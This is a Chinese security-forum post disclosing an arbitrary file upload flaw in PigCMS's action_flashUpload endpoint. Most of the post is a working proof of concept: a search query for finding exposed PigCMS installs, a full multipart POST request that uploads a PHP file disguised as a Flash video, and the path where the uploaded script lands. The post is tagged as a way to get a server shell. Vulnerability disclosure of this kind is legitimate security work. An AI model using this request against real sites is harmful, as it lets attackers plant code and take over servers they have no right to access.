登录
/
注册
首页
论坛
其它
首页
科技
业界
安全
程序
广播
Follow
关于
导读
排行榜
发帖说明
登录
/
注册
账号
自动登录
找回密码
密码
登录
立即注册
搜索
搜索
关闭
CSDN热搜
程序园
精品问答
技术交流
资源下载
本版
帖子
用户
软件
问答
教程
代码
写记录
VIP申请
VIP网盘
网盘
联系我们
发帖说明
道具
勋章
任务
淘帖
动态
分享
留言板
导读
设置
我的收藏
退出
腾讯QQ
微信登录
返回列表
首页
›
资源区
›
程序
›
PigCMS action_flashUpload 任意文件上传漏洞
PigCMS action_flashUpload 任意文件上传漏洞
[ 复制链接 ]
anyue1937
2025-10-15 20:07:52
## 漏洞描述
PigCMS action_flashUpload 方法中存在任意文件上传漏洞,攻击者通过漏洞可以上传任意文件获取到服务器权限
## 漏洞影响
pigcms
## 网络测绘
```app.name="PigCMS"```
## 漏洞复现
登陆页面

验证POC
```POST /cms/manage/admin.php?m=manage&c=background&a=action_flashUpload HTTP/1.1Host:Accept-Encoding: gzip, deflateContent-Type: multipart/form-data; boundary=----aaa
------aaaContent-Disposition: form-data; name="filePath"; filename="test.php"Content-Type: video/x-flv
<?php phpinfo();?>------aaa```

```/cms/upload/images/2025/08/11/1691722887xXbx.php```
渗透
漏洞
getshell
相关帖子
精准定位文件包含漏洞:代码审计中的实战思维
安全攻防丨反序列化漏洞的实操演练
浙大恩特前台RCE漏洞审计
PbootCMS domain SQL注入漏洞
CmsEasy crossall_act.php SQL注入漏洞
Dc-3靶机渗透
DC-4靶机渗透
AI辅助渗透测试小试牛刀
漏洞解析--文件包含漏洞(含漏洞复现)
vip免费申请,1年只需15美金$
回复
使用道具
举报
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
千斤顶
照妖镜
相关推荐
安全
精准定位文件包含漏洞:代码审计中的实战思维
2
849
别萧玉
2025-10-06
安全
安全攻防丨反序列化漏洞的实操演练
1
904
袋岖荤
2025-10-11
安全
浙大恩特前台RCE漏洞审计
0
629
倡遍竽
2025-10-15
程序
PbootCMS domain SQL注入漏洞
2
80
anyue1937
2025-10-15
程序
CmsEasy crossall_act.php SQL注入漏洞
1
53
anyue1937
2025-10-15
业界
Dc-3靶机渗透
0
580
骂治并
2025-10-17
科技
DC-4靶机渗透
0
5
缢闸
2025-10-26
科技
AI辅助渗透测试小试牛刀
0
42
尚腱埂
2025-10-29
业界
漏洞解析--文件包含漏洞(含漏洞复现)
0
536
能杜孱
2025-11-05
回复
(1)
映各
5 天前
回复
使用道具
举报
照妖镜
感谢分享,学习下。
vip免费申请,1年只需15美金$
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
立即注册
回复
本版积分规则
回帖并转播
回帖后跳转到最后一页
浏览过的版块
安全
业界
代码
签约作者
程序园优秀签约作者
发帖
anyue1937
5 天前
关注
0
粉丝关注
3
主题发布
板块介绍填写区域,请于后台编辑
财富榜{圆}
anyue1937
9994893
dage888
999994
3934307807
992122
4
xiangqian
638210
5
刎唇
9993
6
荡俊屯
9948
7
匝抽
9986
8
二艰糖
9970
9
宓碧莹
9988
10
游瞠离
9974
查看更多